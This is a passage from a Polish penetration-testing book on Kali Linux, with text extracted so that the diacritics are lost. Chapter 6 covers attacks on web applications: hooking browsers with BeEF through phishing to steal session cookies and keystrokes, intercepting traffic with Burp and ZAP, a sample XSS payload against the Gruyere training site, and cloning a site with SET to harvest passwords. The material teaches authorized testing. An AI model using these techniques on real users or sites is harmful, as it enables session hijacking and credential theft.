Strona tytu owa 307O wiadczenie o zachowaniu poufno ci 307Zarz dzanie wersjami dokumentacji 308Ramy czasowe projektu 308Streszczenie raportu 309Metodologia 310Szczegoacute owe procedury testowania 312Podsumowanie ustale 313Podatno ci i luki w zabezpieczeniach 315Wnioski i rekomendacje dla rodowiska sieciowego 316Dodatki 319Glosariusz 319
Wykaz prac 319Zewn trzne testy penetracyjne 321Dodatkowe elementy wykazu prac 323
Narz dzia wspomagaj ce tworzenie raportoacutew 325Dradis 325KeepNote 326Maltego CaseFile 326MagicTree 327CutyCapt 327
Podsumowanie 327
Skorowidz 329
Kup książkę Poleć książkę
Spis tre ci
8
Kup książkę Poleć książkę
6
Ataki na aplikacjeinternetowe
i serwery WWW
W tym rozdziale skoncentrujemy si na atakach przeprowadzanych z wykorzystaniem inter-netu Administratorzy odpowiedzialni za bezpiecze stwo rodowiska komputerowego firmyczy organizacji doskonale zdaj sobie spraw z tego e w internecie nie brakuje czarnych charak-teroacutew ktoacutere nieustannie szukaj nowych sposoboacutew prze amywania zabezpiecze W odpowiedzina takie zagro enia administratorzy staraj si implementowa coraz bardziej skomplikowanesystemy zabezpiecze Do najcz ciej spotykanych mechanizmoacutew obronnych nale zaporysieciowe systemy wykrywania w ama i zapobiegania im (IPSIDS mdash ang Intrusion PreventionSystemIntrusion Detection System) czy systemy instalowane bezpo rednio na hostach takiejak programy antywirusowe lub monitoruj ce wykorzystanie zasoboacutew W przesz o ci takie rozwi -zania by y w zupe no ci wystarczaj ce aczkolwiek spotykane obecnie z o liwe programy i innezagro enia ktoacutere czyhaj w sieci staj si coraz bardziej wyrafinowane i cz sto umo liwiajatwe obej cie mechanizmoacutew zabezpieczaj cych oferowanych przez standardowe komercyj-
ne produkty bdquoz poacute kirdquo (COTS mdash ang Commercial Off The Shelf) Narz dzia ktoacutere b dziemyomawiali w tym rozdziale pozwalaj pentesterowi na zdalne omijanie standardowych zabez-piecze atakowanych systemoacutew
Przedstawiane tu zagadnienia i oprogramowanie stanowi dope nienie arsena u technik i na-rz dzi ka dego pentestera aplikacji internetowych Z lektury poprzednich rozdzia oacutew dowie-dzia e si w jaki sposoacuteb przeprowadza rozpoznanie i gromadzi informacje o rodowiskub d cym celem testu penetracyjnego jak wyszukiwa podatno ci i luki w zabezpieczeniachzaroacutewno po stronie serweroacutew jak i klientoacutew aplikacji internetowych oraz pozna e sposobywykorzystywania znalezionych luk do uzyskania nieautoryzowanego dost pu do atakowanego
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
232
systemu Teraz zajmiemy si technikami b d cymi niejako uwie czeniem ca ego procesu ata-kowania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Dodatko-wo poka emy w jaki sposoacuteb do ataku u y hellip serwera b d cego celem ataku oraz jak z amazabezpieczenia aplikacji internetowych w ramach atakoacutew na przegl darki atakoacutew z wykorzy-staniem serweroacutew proxy oraz przechwytywania hase dost pu Omoacutewimy roacutewnie wybranemetody zak oacutecania pracy us ug internetowych za pomoc atakoacutew typu DoS
BeEF mdash Browser Exploitation Framework
Podatno ci i luki w zabezpieczeniach przegl darek mog by wykorzystywane przez z o liweoprogramowanie do zmiany zachowania przegl darki w okre lonych sytuacjach Podatno ciprzegl darek internetowych to bardzo popularny wektor ataku poniewa zdecydowana wi k-szo systemoacutew operacyjnych pod ktoacuterych kontrol dzia aj klienty aplikacji internetowychwyposa ona jest w tak czy inn przegl dark Przyjrzyjmy si zatem jednemu z najpopular-niejszych narz dzi przeznaczonych do wykorzystywania luk w zabezpieczeniach przegl darekinternetowych
Istnieje wiele interesuj cych narz dzi wspomagaj cych przeprowadzanie testoacutew penetracyjnychNarz dzia te powinny si znale w Twoim bdquohakerskimrdquo arsenale Jednym z nich z pewno ci jestprogram BeEF (ang Browser Exploitation Framework) BeEF to pakiet zbudowany w oparciuo przegl dark ktoacutery bdquopodpina si rdquo do jednej przegl darki lub nawet kilku przegl darek w syste-mie klienta i tworzy przyczoacute ek ktoacutery mo na wykorzysta jako baz do dalszych atakoacutew U yt-kownik mo e zosta bdquozaatakowanyrdquo kiedy odwiedza specjalnie przygotowan stron internetow po czym kontynuuje przegl danie innych witryn nie zdaj c sobie zupe nie sprawy z tego enapastnik ma ju pe ny dost p do jego sesji BeEF potrafi omin zaroacutewno sieciowe urz dze-nia zabezpieczaj ce jak i mechanizmy ochronne instalowane bezpo rednio na hostach takiejak systemy antywirusowe Staje si to mo liwe dzi ki wykorzystywaniu luk w zabezpieczeniachpowszechnie spotykanych przegl darek takich jak Internet Explorer czy Firefox
Pakiet BeEF nie jest do czany do wersji 10 systemu Kali Linux ale mo esz pobra go zestrony httpbeefprojectcom Mamy jednak nadziej e ze wzgl du na swoj du popularnow rodowisku pentesteroacutew i nie tylko BeEF znajdzie si w kolejnych wydaniach systemu KaliLinux
Aby zainstalowa pakiet BeEF powiniene otworzy okno terminala i z poziomu u ytkownikaroot wykona nast puj ce polecenia
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
233
apt-get updateapt-get install beef-xss
Polecenie apt-get update mo e zapyta Ci o zgod na aktualizacj lub nadpisanie starszychwersji niektoacuterych plikoacutew W wi kszo ci przypadkoacutew powiniene po prostu zaakceptowa od-powiedzi domy lne Po zako czeniu procesu aktualizacji mo esz wykona drugie polecenieapt-get install beef-xss ktoacutere rozpocznie instalacj pakietu BeEF
Kiedy przedstawione wy ej polecenie zako czy dzia anie pakiet BeEF b dzie gotowy do u ytku
Aby uruchomi program BeEF w oknie terminala przejd do katalogu usrsharebeef-xss i wpiszpolecenie beef co spowoduje uruchomienie serwera pakietu Gdy serwer zostanie uru-chomiony na ekranie wy wietl si adresy URL pozwalaj ce na zarz dzanie pakietem i ata-kowanie u ytkownikoacutew
Aby zarz dza serwerem pakietu uruchom przegl dark i w polu adresu wpisz adres URL ko -cz cy si ci giem znakoacutew uipanel Je eli chcesz przechwyci sesj ofiary za pomoc pakietuBeEF powiniene przekierowa j na adres URL serwera ko cz cy si ci giem znakoacutew hookjsAby to zrobi b dziesz musia opracowa odpowiedni strategi post powania ktoacutera pozwoliCi przekona potencjalne ofiary do odwiedzenia takiego adresu Mo esz do tego celu wyko-rzysta roacute ne techniki takie jak phishing czy ataki socjotechniczne
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
234
W naszym przypadku panel zarz dzania pakietu jest dost pny pod adresem http17216861443000uipanel Domy lna nazwa u ytkownika i has o dost pu brzmi identycznie beef
Kiedy ofiara ataku wejdzie lub zostanie przekierowana na stron hookjs napastnik zobaczyna panelu zarz dzania serwera BeEF informacj o nowej przegl darce BeEF doda nowy systemdo listy potencjalnych celoacutew i b dzie wy wietla go za ka dym razem kiedy ofiara ataku po-jawi si w sieci Przegl darki ofiar ktoacutere w danej chwili s od czone od internetu b d po-datne na atak kiedy znowu pod cz si do sieci niezale nie od tego czy ponownie odwiedzwcze niej stron hookjs Na kolejnym rysunku przedstawiono wygl d g oacutewnego okna paneluzarz dzania serwera BeEF z widocznymi opcjami ataku na przechwycony system
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
235
Widoczny na poprzednim rysunku host ktoacuterego przegl darka zosta a przechwycona to lap-top pracuj cy pod kontrol systemu Windows BeEF potrafi odkry bardzo wiele szczegoacute oacutewna temat przechwyconego systemu na przyk ad to czy ofiara u ywa przegl darki Firefox czyhost pracuje pod kontrol 32- czy 64-bitowego systemu operacyjnego jakie dodatkowewtyczki zosta y zainstalowane w przegl darce czy obs uga skryptoacutew i apletoacutew Java jest w -czona itp Na skompromitowanych systemach napastnik mo e zdalnie wykonywa roacute ne po-lecenia w cza sygna d wi kowy przechwytywa ciasteczka sesji tworzy zrzuty ekranuprzechwytywa wszystkie znaki wpisywane z klawiatury a nawet wykorzystywa przechwy-con przegl dark jako serwer proxy do atakowania innych systemoacutew Przyk adem zastoso-wania pakietu mo e by sytuacja w ktoacuterej u ytkownik skompromitowanego systemu logujesi do serwisu takiego jak Facebook Napastnik dzi ki pakietowi BeEF mo e przechwyciciasteczko takiej sesji a nast pnie u y go w swojej przegl darce do przechwycenia sesjiu ytkownika i uzyskania dzi ki temu pe nego dost pu do konta Facebook ofiary Nietrudnosobie wyobrazi e w takiej sytuacji z o liwe i destrukcyjne mo liwo ci napastnika s prak-tycznie nieograniczone Raz uchwycony przyczoacute ek daje nieograniczony dost p do przegl -darki ofiary i jej sesji
BeEF dostarcza napastnikowi szczegoacute owych informacji na temat zaatakowanego systemu i logujewszystkie wykonywane w nim polecenia Informacje o zaatakowanym systemie oraz dziennikwykonanych polece mog by bez problemu skopiowane i wklejone do raportu ko cowego
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
236
Obrona przed atakami dokonywanymi z u yciem narz dzi penetracyjnych opartych na prze-gl darkach jest bardzo trudna Najlepszym rozwi zaniem jest oczywi cie zadbanie o to aby zaw-sze korzysta z najnowszej wersji przegl darki z zainstalowanymi najnowszymi pakietami aktuali-zacji oraz z wy czon mo liwo ci uruchamiania apletoacutew Java czy animacji Flash Oproacutecztego dodatkow warstw zabezpiecze mog zapewni rozwi zania pozwalaj ce na wykrywanienajcz ciej spotykanych zagro e takie jak system NGIPS (ang Next Generation IntrusionPrevention System) Znacz c wi kszo ofiar atakoacutew przeprowadzonych z wykorzystaniemnarz dzi takich jak BeEF stanowi u ytkownicy ktoacuterzy klikn li specjalnie przygotowane czezamieszczone w wiadomo ci poczty elektronicznej lub udost pnione w popularnych serwi-sach spo eczno ciowych przez napastnika podaj cego si za kogo innego godnego zaufania
FoxyProxy mdash wtyczka przegl darki Firefox
Je eli masz przegl dark Firefox i chcesz u ywa serweroacutew proxy takich jak ZAP mdash Zed At-tack Proxy czy BURP do testowania aplikacji internetowych to mo esz skorzysta z wtyczkiFoxyProxy ktoacutera znakomicie upraszcza proces prze czania oraz w czania i wy czania po-szczegoacutelnych serweroacutew proxy Inaczej moacutewi c FoxyProxy to wtyczka przegl darki Firefoxpozwalaj ca na atwe zarz dzanie serwerami proxy modyfikacj ich ustawie oraz ich w -czanie i wy czanie Wtyczk FoxyProxy mo esz pobra z sieciowego repozytorium rozsze-rze programy Firefox
Gdy zainstalujesz wtyczk na pasku narz dzi w goacuternej cz ci g oacutewnego okna przegl darkipojawi si ikona FoxyProxy Kiedy j klikniesz lewym przyciskiem myszy wy wietli si oknoopcji i ustawie wtyczki
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
237
Aby doda nowy serwer proxy do wtyczki FoxyProxy powiniene wykona polecenia przed-stawione poni ej
1 Kliknij przycisk Add New Proxy Na ekranie pojawi si nowe okno dialogowe 2 Wybierz opcj Manual Proxy Configuration 3 Wpisz adres IP lub nazw serwera proxy oraz podaj numer jego portukomunikacyjnego
4 Kliknij przycisk OK aby zapisa ustawienia nowego serwera
W tym momencie wtyczka FoxyProxy jest jeszcze wy czona co oznacza e ca y ruch sieciowygenerowany przez przegl dark odbywa si bez po rednictwa serwera proxy (w polu SelectMode jest ustawiona opcja Completely disable FoxyProxy) Aby u y wybranego serwera proxyrozwi list Select Mode i wybierz z niej dan opcj Jak wida dzi ki takiemu rozwi zaniumo esz szybko prze cza przegl dark na roacute ne serwery proxy lub ca kowicie wy czymo liwo korzystania z serwera proxy
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
238
BURP Proxy
BURP Proxy to narz dzie ktoacutere przechwytuje ruch HTTP oraz HTTPS co pozwala pentesterowina badanie funkcjonowania aplikacji internetowych wyszukiwanie luk w ich zabezpieczeniachoraz analizowanie ruchu sieciowego generowanego mi dzy serwerem aplikacji a klientemPakiet BURP Proxy cieszy si ogromn popularno ci nie tylko ze wzgl du na zdolno prze-prowadzania analizy ruchu sieciowego ale roacutewnie a mo e przede wszystkim ze wzgl du namo liwo modyfikacji i retransmitowania przesy anych da bdquow locierdquo Za chwil wyja nimy jakwykorzysta pakiet BURP Proxy do modyfikowania da i wykradania danych uwierzytel-niaj cych u ytkownikoacutew
Pami taj e BURP Proxy to narz dzie wchodz ce w sk ad rozbudowanego pakietu narz dzio nazwie Burp Suite Kiedy u ytkownik wpisuje na pasku adresu swojej przegl darki wybranyadres URL taki jak na przyk ad httpwwwDrChaoscom oczekuje e zostanie przeniesionyna tak stron Serwer proxy przechwytuje takie danie i przesy a je do serwera niejakobdquow imieniurdquo danego klienta Serwery proxy s zazwyczaj wykorzystywane do monitorowania ge-nerowanego ruchu sieciowego oraz ochrony klientoacutew przed potencjalnie szkodliwymi danymi(np witrynami ze z o liwym oprogramowaniem czy witrynami zainfekowanymi) Jako pente-ster mo esz wykorzystywa serwery proxy do przechwytywania ruchu sieciowego wysy anegoprzez klienta a nast pnie kopiowania modyfikowania i retransmitowania jego da
Aby w systemie Kali Linux uruchomi program BURP Suite w menu g oacutewnym przejd do grupyKali Linux a nast pnie wybierz polecenie SniffingSpoofingWeb Sniffersburpsuite
Na ekranie pojawi si g oacutewne okno pakietu Burp Suite
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
239
Aby skonfigurowa serwer proxy przejd na kart Proxy Jak atwo zauwa y opcja przechwyty-wania ruchu sieciowego jest domy lnie w czona (Intercept is on) Kiedy jest w czona BURPProxy zatrzymuje wszystkie dania wysy ane z przegl darki klienta do serwera WWW dzi kiczemu pentester ma mo liwo pe nej analizy takiego po czenia Po zako czeniu przegl da-nia pentester mo e r cznie zezwoli na kontynuowanie po czenia
Opcj Intercept musisz wy czy r cznie w przeciwnym wypadku wszystkie dania wysy ane przezklienta b d przechwytywane i zatrzymywane na poziomie BURP Proxy
Kolejne opcje konfiguracyjne na ktoacutere musisz zwroacuteci uwag s umieszczone na karcieOptions Znajdziesz tutaj opcje pozwalaj ce na sprawdzenie lub zmian domy lnego portukomunikacyjnego wykorzystywanego przez BURP Proxy czy skonfigurowanie interfejsu sie-ciowego wykorzystywanego przez pakiet Domy lnie serwer BURP Proxy jest skonfigurowa-ny do pracy na interfejsie p tli zwrotnej jak przedstawiono na rysunku zamieszczonym poni ejInterfejs p tli zwrotnej to specjalny rodzaj interfejsu sieciowego reprezentuj cy komputer lokal-ny do ktoacuterego przypisany jest zazwyczaj adres IP 127001 Interfejs p tli zwrotnej nie jestpowi zany z adnym urz dzeniem fizycznym i jest stosowany po to aby korzystaj c z po -czenia sieciowego system operacyjny Twojego komputera moacuteg si komunikowa sam ze so-b Inaczej moacutewi c je eli chcesz poprzez sie wysy a do siebie wiadomo ci powinieneu y interfejsu p tli zwrotnej Je eli chcesz wykorzystywa pakiet Burp Suite do pracy z innymikomputerami powiniene w konfiguracji pakietu doda odpowiedni interfejs Ethernet orazpoda jego adres IP
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
240
W naszym przyk adzie b dziemy u ywa interfejsu p tli zwrotnej
Kolejnym etapem b dzie skonfigurowanie przegl darki do pracy z pakietem Burp SuitePraktycznie wszystkie przegl darki mo na skonfigurowa w niemal identyczny lub przynajm-niej bardzo zbli ony sposoacuteb Na kolejnym rysunku przedstawiamy konfiguracj serwera proxyw przegl darce Firefox
Gdy zako czysz konfiguracj serwera proxy w przegl darce przejd na dowoln stron WWWna przyk ad wpisuj c dany adres URL w pasku przegl darki (na przyk ad wwwDrChaoscom)Z pewno ci zauwa ysz e nic si nie wydarzy o Dzieje si tak poniewa opcja Intercept
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
241
jak pami tasz jest domy lnie w czona Je eli przyjrzysz si teraz karcie Intercept to przeko-nasz si e zmieni si jej kolor t a co oznacza e przechwycone zosta o nowe danie
Kiedy klikniesz kart Intercept b dziesz moacuteg dok adnie zbada natur przechwyconego -dania Po zako czeniu mo esz klikn przycisk Forward lub Drop co spowoduje odpowied-nio przes anie dalej lub zablokowanie przechwyconego dania
Je eli klikniesz przycisk Forward zobaczysz e przechwycone danie zostaje przekazane dalejdo serwera WWW a serwer odsy a odpowied Co wi cej powiniene roacutewnie zobaczy estrona WWW zosta a za adowana w oknie przegl darki Pami taj jednak e niektoacutere stronyWWW sk adaj si z wielu komponentoacutew i ich za adowanie b dzie wymaga o r cznego prze-kazania wielu da (czyli b dziesz musia wiele razy klika przycisk Forward)
Kolejn ciekaw i u yteczn funkcj pakietu jest Burp Spider czyli robot sieciowy pozwala-j cy na zautomatyzowanie procesu wykrywania i mapowania aplikacji internetowych Zanimb dziesz moacuteg z niego skorzysta musisz najpierw skonfigurowa serwer BURP Proxy dopracy z internetem tak jak to pokazywali my wcze niej Nast pnie w cz modu Burp Spiderktoacutery mo e automatycznie mapowa wszystkie przechwycone dania i wyszukiwa nowepotencjalne cele ataku
Aby u y modu u Burp Spider przejd na kart Spider gdzie zobaczysz domy lne ustawieniakonfiguracyjne robota sieciowego Aby w czy robota kliknij przycisk Spider is paused couruchomi robota i zmieni nazw przycisku na Spider is running (zobacz pierwszy rysunek nanast pnej stronie)
Burp Spider mapuje wszystkie dania przechwycone przez serwer proxy i wy wietla je na karcieTarget Aby zobaczy co zosta o do tej pory przechwycone przejd na kart Target Znajdziesztam list wszystkich przechwyconych przez proxy witryn z ktoacuterymi czy si wybrana przezCiebie witryna podczas adowania Adresy URL wy wietlone w szarym kolorze oznaczaj witrynyktoacuterych nie przegl da e bezpo rednio Adresy URL wyroacute nione czarnym kolorem oznaczajwitryny ktoacutere odwiedzi e bezpo rednio (zobacz drugi rysunek na nast pnej stronie)
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
242
Aby skorzysta z robota sieciowego kliknij wybrany adres URL prawym przyciskiem myszyi z menu podr cznego wybierz polecenie Spider this host
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
243
Je eli teraz przejdziesz na kart Spider to przekonasz si e liczby przetworzonych daw sekcji Spider Status rosn od 0 w goacuter
Gdy Burp napotka jakie formularze poprosi Ci o ich wype nienie lub zignorowanie Je eliwype nisz formularz Burp sprawdzi kolejne strony ktoacutere sta y si dost pne po wype nieniuformularza
Kiedy Spider zako czy dzia anie wroacute na kart Targets i poszukaj strony ktoacuterej adres wybra edla robota sieciowego Kliknij ikon troacutejk ta znajduj c si z lewej strony adresu spowodujeto rozwini cie listy Teraz mo esz zobaczy wyniki dzia ania modu u Spider na pierwszym ry-sunku na nast pnej stronie
Burp wy wietla wszystkie strony i cza ktoacutere znalaz Spider Oproacutecz tego robot przechwytujeroacutewnie g oacutewny katalog hosta style stron internetowych podkatalogi oraz skrypty Java W kolej-nym przyk adzie prezentujemy szereg katalogoacutew przechwyconych z witryny wwwDrchaoscom
Burp pozwala roacutewnie na filtrowanie wynikoacutew Aby skorzysta z tej mo liwo ci kliknij pasekFilter znajduj cy si w goacuternej cz ci okna programu Na ekranie pojawi si rozwijane oknozawieraj ce szereg roacute nych opcji filtrowania (zobacz drugi rysunek na nast pnej stronie)
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
244
Modu Spider pakietu Burp Suite pozwala pentesterowi na sprawdzenie jak dana aplikacja inter-netowa czy strona WWW jest skonfigurowana oraz jakie mo na na niej znale cza i dok dprowadz Dobr analogi funkcjonalno ci tego modu u mo e by sytuacja w ktoacuterej znajdujemysi w pokoju z dziesi tkami drzwi i mo emy od razu w tym samym czasie sprawdzi dok dprowadz ka de z nich
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
245
OWASP-ZAPZAP to proste w u yciu zintegrowane narz dzie penetracyjne przeznaczone do wyszukiwa-nia podatno ci i luk w zabezpieczeniach aplikacji internetowych Jak pami tasz w rozdziale 3 do-konali my kroacutetkiej prezentacji tego narz dzia i jego mo liwo ci w zakresie skanowania witryninternetowych pod k tem potencjalnych s abych stron zabezpiecze Powroacutecimy teraz dopracy z tym narz dziem i poka emy jak mo na u y programu ZAP do identyfikacji i wykorzy-stywania luk pozwalaj cych na przeprowadzanie atakoacutew typu cross-site scripting (atakoacutew XSS)
ZAP jest pakietem preinstalowanym w systemie Kali Linux 10 Aby go uruchomi w menug oacutewnym przejd do grupy Kali Linux i nast pnie wybierz polecenie SniffingSpoofingWebSniffersowasp-zap Zamiast tego mo esz po prostu otworzy nowe okno terminala i wpisapolecenie zap tak jak to zosta o zaprezentowane na rysunku poni ej
Przedstawiamy kroacutetki opis sposobu konfiguracji pakietu ZAP do pracy z przegl dark Firefoxpodobnie jak to mia o miejsce w rozdziale 3
1 Zaakceptuj postanowienia licencyjne 2 Wygeneruj nowy certyfikat SSL lub zaimportuj certyfikat istniej cy 3 Zaimportuj certyfikat do przegl darki Aby to zrobi w przegl darce Firefoxwybierz z menu polecenie PreferencesAdvanced i nast pnie przejd na kartEncryption
4 Kliknij przycisk View Certificates i zaimportuj certyfikat 5 Zaznacz wszystkie opcje zaufania zwi zane z u ywaniem nowego certyfikatu 6 Skonfiguruj przegl dark do pracy z serwerem proxy pakietu ZAP Aby to zrobiw przegl darce Firefox wybierz z menu polecenie PreferencesAdvanced i nast pnieprzejd na kart Network
7 Jako nazw serwera proxy wpisz localhost i ustaw go do pracy na porcie 8080ktoacutery jest domy lnym portem komunikacyjnym serwera proxy pakietu ZAP
8 Zaznacz opcj pozwalaj c na u ywanie serwera proxy dla wszystkich protoko oacutewkomunikacyjnych
Pami taj e zanim b dziesz moacuteg u ywa pakietu ZAP musisz wygenerowa odpowiedni certyfikat SSL
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
246
Po zako czeniu konfigurowania pakietu ZAP oraz przegl darki Firefox mo esz przej na dowol-nie wybran stron internetow Przekonasz si e nazwy odwiedzanych witryn pojawiaj si nakarcie Sites w oknie pakietu ZAP W naszym przyk adzie przeszli my na stron wwwDrChaoscomi przekonali my si e lista odwiedzonych stron jest dosy poka na Dzieje si tak dlatego estrona DrChaos aduje takie czy inne elementy pochodz ce z tych stron
ZAP jest wyposa ony zaroacutewno w aktywne jak i pasywne skanery stron internetowych Skane-ry pasywne nie przeprowadzaj adnych atakoacutew i s bezpieczne dla wszystkich aplikacji in-ternetowych Z kolei skanery aktywne mog przeprowadza ca e serie roacute nych atakoacutew i do-konuj proacuteb uruchamiania roacute nych skryptoacutew w aplikacjach i na stronach internetowych como e prowadzi do wygenerowania alarmoacutew przez systemy zabezpieczaj ce atakowanych ho-stoacutew i aplikacji
W kolejnym przyk adzie b dziemy wykorzystywa oba rodzaje skaneroacutew aktywne i pasywneZ oczywistych wzgl doacutew dobrze by by o gdyby dysponowa swoim serwerem testowym naktoacuterym moacuteg by przeprowadza takie testy poniewa zdecydowanie odradzamy przeprowadzanieatakoacutew za pomoc pakietu ZAP na innym serwerze bez autoryzacji i zgody jego w a cicielaPoniewa testy podatno ci chcemy przeprowadzi na serwerze do ktoacuterego testowania mamyodpowiedni autoryzacj na nasze potrzeby ponownie wykorzystamy znany Ci ju projektGoogle Gruyere
Firma Google uruchomi a projekt Gruyere w celu umo liwienia testowania luk w zabezpie-czeniach i mechanizmoacutew obronnych aplikacji internetowych Strony internetowe projektuGruyere maj kilka specjalnie przygotowanych luk w zabezpieczeniach w cznie z podatno-ciami na ataki XSS Z projektu Gruyere mo esz korzysta interaktywnie w sieci lub mo esz
pobra go na swoacutej komputer lokalny
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
247
Utwoacuterz swoj w asn instancj projektu Gruyere na ktoacuterej b dziesz pracowa z pakietem ZAP Poutworzeniu instancji projektu otrzymasz swoacutej w asny unikatowy adres URL W naszym przypad-ku adres URL projektu wygl da nast puj co httpgoogle-gruyereappspotcom326352883334
Powroacutecimy teraz do pakietu ZAP i wykonamy szybkie skanowanie tego adresu URL
Na powy szym rysunku wida szereg plikoacutew SEED w cznie z plikiem ktoacuterego adres URI wy-gl da bardzo interesuj co httpgoogle-gruyereappspotcom326352883334invalid
Kiedy umie cimy adres tego pliku w przegl darce otrzymamy nast puj cy komunikat o b dzie
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
248
Kiedy zabieramy si do przeprowadzania atakoacutew XSS warto pami ta e z ich punktu widzenianajbardziej bdquoniebezpiecznymirdquo znakami s znak mniejszo ci lt oraz znak wi kszo ci gt Je eli hakerpotrafi zmusi aplikacj internetow do wstawienia kodu na stron bezpo rednio za pomocznakoacutew lt i gt to zazwyczaj otwiera to szeroko drzwi do wstrzykni cia z o liwych skryptoacutew do apli-kacji Poni ej przedstawiamy jeszcze inne przyk ady interesuj cych plikoacutew SEED
Poni ej przedstawiamy przyk ad wykorzystania jednego z adresoacutew plikoacutew SEED do wstrzykni -cia kodu Aby to zrobi utworzymy adres URL i dodamy do niego skrypt alert(1) co pozwolinam przekona si czy po uruchomieniu na stronie internetowej pojawi si wyskakuj ce oknoz komunikatem o wyst pieniu b du (zobacz rysunek na nast pnej stronie)
httpgoogle-gruyereappspotcom326352883334ltscriptgtalert(1)ltscriptgt
Powy szy przyk ad pokazuje e atakowana aplikacja internetowa wy wietli a na ekranie wyska-kuj ce okno z komunikatem o wyst pieniu b du dowodz c w ten sposoacuteb e jest podatna nataki atak Teraz mo emy u y pakietu ZAP do powtoacuterzenia tego ataku wyproacutebowania innegoataku lub przetestowania podobnych metod wykorzystuj cych luki w zabezpieczeniach XSS
W takich sytuacjach zawsze zalecamy samodzielne poeksperymentowanie z otrzymywanymikomunikatami o b dach tak aby sprawdzi czy nie da oby si ich wykorzysta do bdquozmusze-niardquo aplikacji do ujawnienia cennych dla pentestera informacji Projekt Gruyere jest znako-mitym poligonem do wiadczalnym dzi ki ktoacuteremu mo esz testowa i rozwija swoje umie-j tno ci oraz nabiera do wiadczenia w pracy z pakietem ZAP
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
249
Je eli chcesz sprawdzi mo liwo ci swojej obrony przed zdalnymi atakami to ZAP roacutewniemo e si tutaj sprawdzi znakomicie zw aszcza w przypadku atakoacutew takich jak XSS Niektoacuterzyu ytkownicy wierz e podczas przegl dania zasoboacutew internetu nie musz si przejmowalukami w zabezpieczeniach XSS je eli zgodnie z informacjami producenta ich przegl darkaposiada mechanizmy obrony przed takimi atakami Niestety prawda jest taka e zabezpieczeniaprzegl darki nie mog by uwa ane za doskona e ze wzgl du na prosty fakt e przegl darkanie jest w stanie oszacowa na ile bezpieczny jest kod aplikacji internetowej ktoacuterej ona jestklientem Do wiadczeni hakerzy mog by w stanie obej takie zabezpieczenia i umie ci w ko-dzie strony skrypty przeznaczone do atakowania przegl darek odwiedzaj cych dan witryn Z tego powodu najlepszym sposobem zabezpieczania zaroacutewno serweroacutew aplikacji interneto-wych jak i korzystaj cych z nich klientoacutew jest wyszukiwanie identyfikowanie i usuwanie lukw zabezpieczeniach Mo na tego dokona za pomoc narz dzi takich jak ZAP
Przechwytywanie hase mdash pakiet SETW rozdziale 4 omoacutewili my pokroacutetce podstawowe mo liwo ci pakietu SET (ang Social Engi-neer Toolkit) W tym podrozdziale powroacutecimy do tego pakietu i skoncentrujemy si na zagad-nieniach zwi zanych z wykorzystywaniem go do gromadzenia hase dost pu oraz przechwy-tywania innych poufnych informacji
Jak pami tasz aby uruchomi pakiet SET powiniene w g oacutewnym menu systemu przej do gru-py Kali Linux a nast pnie wybra polecenie Exploitation ToolsSocial Engineering Toolsse-toolkit
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
250
Przed pierwszym uruchomieniem pakietu upewnij si e dokona e jego aktualizacji do najnow-szej wersji Szczegoacute ow instrukcj jak krok po kroku przeprowadzi aktualizacj pakietu SETznajdziesz w rozdziale 4
Kiedy pakiet SET zako czy klonowanie wybranej witryny internetowej mo e j uruchomi na w asnymserwerze WWW Bardzo wa nym elementem ataku jest przekonanie u ytkownika b d cego celem abypo czy si z kopi witryny dzia aj c na Twoim w asnym serwerze Oznacza to e do atakoacutew na celew internecie b dziesz musia u y maszyny posiadaj cej publiczny adres IP Oproacutecz tego b dziesz musiautworzy odpowiednie regu y dla zapory sieciowej tak aby zdalni u ytkownicy mogli si po czy z ze-wn trz z Twoim serwerem
Po zako czeniu konfiguracji ustawie adresoacutew IP i regu zapory sieciowej nadszed czas nauruchomienie pakietu SET
Tym razem pakietu SET b dziemy u ywa do przechwytywania i zbierania hase dost pu Jakpami tasz SET posiada mechanizmy pozwalaj ce na sklonowanie praktycznie dowolnie wybranejwitryny internetowej W naszym przyk adzie wykorzystamy pakiet SET do sklonowania witrynyjednego z najpopularniejszych serwisoacutew spo eczno ciowych Po uruchomieniu pakietu musisz za-akceptowa wszystkie warunki umowy licencyjnej tak jak zaprezentowano na rysunku na na-st pnej stronie
Po uruchomieniu pakietu SET warto od czasu do czasu wybra z menu g oacutewnego opcj 5) Update theSocial-Engineer Toolkit ktoacutera sprawdzi czy korzystasz z najnowszej wersji pakietu Je eli oka e si enie zostan zainstalowane odpowiednie aktualizacje Je eli po wybraniu tej opcji wy wietli si komuni-kat o b dzie informuj cy e repozytoria GIT nie istniej to prawdopodobnie pakiet GIT nie jest zainstalowa-ny lub zosta zainstalowany niepoprawnie (zawsze istnieje roacutewnie ryzyko e co si zmieni o w ca ejprocedurze od czasu kiedy powstawa a ta ksi ka) Wi cej szczegoacute owych informacji i wskazoacutewek na tematu ytkowania pakietu SET w systemie Kali Linux znajdziesz na blogach autoroacutew ksi ki Amira Lakhaniego(zobacz stron httpwwwDrChaoscom) lub Josepha Muniza (zobacz stron httpwwwthesecurity
bloggercom)
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
251
1 Gdy zako czy si aktualizacja pakietu SET do najnowszej wersji z menu g oacutewnegowybierz opcj 1) Social-Engineering Attacks
